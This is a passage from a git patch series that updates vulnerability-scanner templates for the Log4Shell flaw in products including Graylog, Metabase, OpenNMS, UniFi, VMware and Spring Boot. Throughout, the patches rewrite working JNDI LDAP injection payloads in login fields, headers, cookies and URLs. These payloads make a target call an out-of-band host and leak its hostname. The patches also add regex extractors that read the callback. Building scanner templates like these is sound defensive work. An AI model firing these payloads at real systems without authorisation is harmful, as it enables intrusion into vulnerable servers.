'\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by cs 2022/10/10 diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml index 7c7aae81a39..982527b8fe9 100644 --- a/http/vulnerabilities/other/graylog-log4j.yaml +++ b/http/vulnerabilities/other/graylog-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -31,7 +35,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}} - {"username":"${jndi:ldap://${sys:os.name}.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} + {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}","password":"admin","host":"{{Hostname}}"} matchers-condition: and matchers: @@ -43,7 +47,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -55,10 +59,16 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2023/03/23 From 0c049e028e22996e24173b68efac33fa43df4761 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Thu, 4 May 2023 00:16:17 +0530 Subject: [PATCH 06/10] updated templates --- .../vulnerabilities/other/metabase-log4j.yaml | 16 ++++++++++++--- .../other/opennms-log4j-jndi-rce.yaml | 16 ++++++++++++--- http/vulnerabilities/other/rundeck-log4j.yaml | 16 ++++++++++++--- .../other/unifi-network-log4j-rce.yaml | 20 ++++++++++++++++--- .../other/vmware-siterecovery-log4j-rce.yaml | 16 ++++++++++++--- .../other/xenmobile-server-log4j.yaml | 16 ++++++++++++--- .../springboot/springboot-log4j-rce.yaml | 16 ++++++++++++--- .../vmware/vmware-hcx-log4j.yaml | 17 +++++++++++++--- .../vmware/vmware-nsx-log4j.yaml | 16 ++++++++++++--- .../vmware-operation-manager-log4j.yaml | 16 ++++++++++++--- .../vmware/vrealize-operations-log4j-rce.yaml | 20 ++++++++++++++++--- 11 files changed, 152 insertions(+), 33 deletions(-) diff --git a/http/vulnerabilities/other/metabase-log4j.yaml b/http/vulnerabilities/other/metabase-log4j.yaml index 094b3d33cb9..bd2d6791423 100644 --- a/http/vulnerabilities/other/metabase-log4j.yaml +++ b/http/vulnerabilities/other/metabase-log4j.yaml @@ -19,10 +19,14 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,metabase,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - method: GET path: - - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}" + - "{{BaseURL}}/api/geojson?url=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}}" matchers-condition: and matchers: @@ -34,7 +38,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -46,8 +50,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml index e37a71794fe..4e09dca5185 100644 --- a/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml @@ -21,6 +21,10 @@ info: verified: "true" tags: jndi,log4j,rce,opennms,cve,cve2021,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -28,7 +32,7 @@ http: Referer: {{RootURL}}/opennms/login.jsp Content-Type: application/x-www-form-urlencoded - j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=password&Login=&j_usergroups= matchers-condition: and matchers: @@ -40,17 +44,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by cs on 2022/10/23 diff --git a/http/vulnerabilities/other/rundeck-log4j.yaml b/http/vulnerabilities/other/rundeck-log4j.yaml index 73c8bd2bf34..f8650863dc4 100644 --- a/http/vulnerabilities/other/rundeck-log4j.yaml +++ b/http/vulnerabilities/other/rundeck-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,rundeck,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -29,7 +33,7 @@ http: Connection: close Referer: {{BaseURL}}/user/login - j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin + j_username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&j_password=admin matchers-condition: and matchers: @@ -41,7 +45,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: location @@ -53,8 +57,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index 58c3871fa08..f61c9ef1b95 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -21,6 +21,10 @@ info: verified: "true" tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -30,7 +34,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/manage/account/login?redirect=%2Fmanage - {"username":"user","password":"pass","remember":"${jndi:ldap://${hostName}.{{interactsh-url}}}","strict":true} + {"username":"user","password":"pass","remember":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}","strict":true} matchers-condition: and matchers: @@ -42,13 +46,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/06/03 diff --git a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml index 3ea53743372..96d6c8b5b2d 100644 --- a/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml +++ b/http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml @@ -20,10 +20,14 @@ info: verified: "true" tags: cve,cve2021,jndi,log4j,rce,oast,vmware,siterecovery,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - method: GET path: - - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=%24%7Bjndi%3Aldap%3A%2F%2F%24%7BhostName%7D.{{interactsh-url}}%7D' + - '{{BaseURL}}/dr/authentication/oauth2/oauth2login?error=$%7Bjndi%3Aldap%3A%2F%2F$%7B%3A-{{rand1}}%7D$%7B%3A-{{rand2}}%7D.$%7BhostName%7D.uri.{{interactsh-url}}%7D' matchers-condition: and matchers: @@ -35,7 +39,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -47,8 +51,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/other/xenmobile-server-log4j.yaml b/http/vulnerabilities/other/xenmobile-server-log4j.yaml index fca48fbc4f8..a90139cbd24 100644 --- a/http/vulnerabilities/other/xenmobile-server-log4j.yaml +++ b/http/vulnerabilities/other/xenmobile-server-log4j.yaml @@ -10,6 +10,10 @@ info: shodan-query: title:"XenMobile" tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -22,7 +26,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp - login=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin + login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin matchers-condition: and matchers: @@ -34,7 +38,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: body @@ -46,8 +50,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml index f4d020ff725..4987e6d9cb8 100644 --- a/http/vulnerabilities/springboot/springboot-log4j-rce.yaml +++ b/http/vulnerabilities/springboot/springboot-log4j-rce.yaml @@ -18,12 +18,16 @@ info: cwe-id: CWE-502 tags: cve,cve2021,springboot,rce,oast,log4j,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - X-Api-Version: ${jndi:ldap://${hostName}.{{interactsh-url}}} + X-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}} matchers-condition: and matchers: @@ -35,17 +39,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/05/31 diff --git a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml index 5e7fce43b9c..189fd688e06 100644 --- a/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-hcx-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -31,7 +35,7 @@ http: { "authType": "password", - "username": "${jndi:ldap://${sys:os.name}.{{interactsh-url}}}", + "username": "${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}", "password": "admin" } @@ -45,16 +49,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by md on 2022/10/05 diff --git a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml index e64ea302b51..59ef04cc462 100644 --- a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -29,7 +33,7 @@ http: Origin: {{BaseURL}} Referer: {{BaseURL}}/login.jsp - username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&submit= + username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&submit= matchers-condition: and matchers: @@ -41,7 +45,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: location @@ -53,8 +57,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml index 6f63c216142..23bdce65f6a 100644 --- a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml @@ -19,6 +19,10 @@ info: verified: "true" tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -32,7 +36,7 @@ http: Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin - mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us + mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us matchers-condition: and matchers: @@ -44,7 +48,7 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -56,8 +60,14 @@ http: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml index e66de93131e..c4b09dcd706 100644 --- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml +++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml @@ -22,6 +22,10 @@ info: verified: "true" tags: cve,cve2021,oast,rce,log4j,vmware,vrealize,kev +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + http: - raw: - | @@ -31,7 +35,7 @@ http: Origin: {{RootURL}} Referer: {{RootURL}}/ui/ - {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"} + {"username":"${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}","password":"admin"} matchers-condition: and matchers: @@ -43,13 +47,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/04/05 From 05eb75398536c07f2acd54f3335d10a70adbc17b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 4 May 2023 11:05:06 +0530 Subject: [PATCH 07/10] Update apache-ofbiz-log4j-rce.yaml --- .../apache/apache-ofbiz-log4j-rce.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml index b5b082566d5..a76f12528b9 100644 --- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml @@ -30,7 +30,7 @@ http: - | GET /webtools/control/main HTTP/1.1 Host: {{Hostname}} - Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}} + Cookie: OFBiz.Visitor=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookie.{{interactsh-url}}} matchers-condition: and matchers: @@ -45,6 +45,16 @@ http: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 From f96e98052e0e040b31ed6cf9fdba70da7980a9a3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Mon, 8 May 2023 11:07:00 +0530 Subject: [PATCH 08/10] payload update --- http/cves/2021/CVE-2021-45046.yaml | 10 +++++++--- .../apache/log4j/jamf-pro-log4j-rce.yaml | 12 +++++++++++- .../cisco/cisco-cloudcenter-suite-log4j-rce.yaml | 2 +- .../cisco/cisco-unified-communications-log4j.yaml | 8 +++++++- http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml | 2 +- http/vulnerabilities/code42/code42-log4j-rce.yaml | 2 +- http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml | 2 +- .../mobileiron/mobileiron-log4j-jndi-rce.yaml | 2 +- .../other/elasticsearch5-log4j-rce.yaml | 2 +- .../other/goanywhere-mft-log4j-rce.yaml | 2 +- http/vulnerabilities/other/graylog-log4j.yaml | 2 +- http/vulnerabilities/other/metabase-log4j.yaml | 2 +- 12 files changed, 34 insertions(+), 14 deletions(-) diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 5b0a05a870b..3022c593387 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -52,19 +52,23 @@ http: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: + - type: kval + kval: + - interactsh_ip # Print remote interaction IP in output + - type: regex part: interactsh_request group: 2 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output # Enhanced by mp on 2022/02/28 diff --git a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml index da77e938cc7..fa5dad61172 100644 --- a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml +++ b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml @@ -35,7 +35,7 @@ http: Referer: {{RootURL}} Content-Type: application/x-www-form-urlencoded - username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/test}&password= + 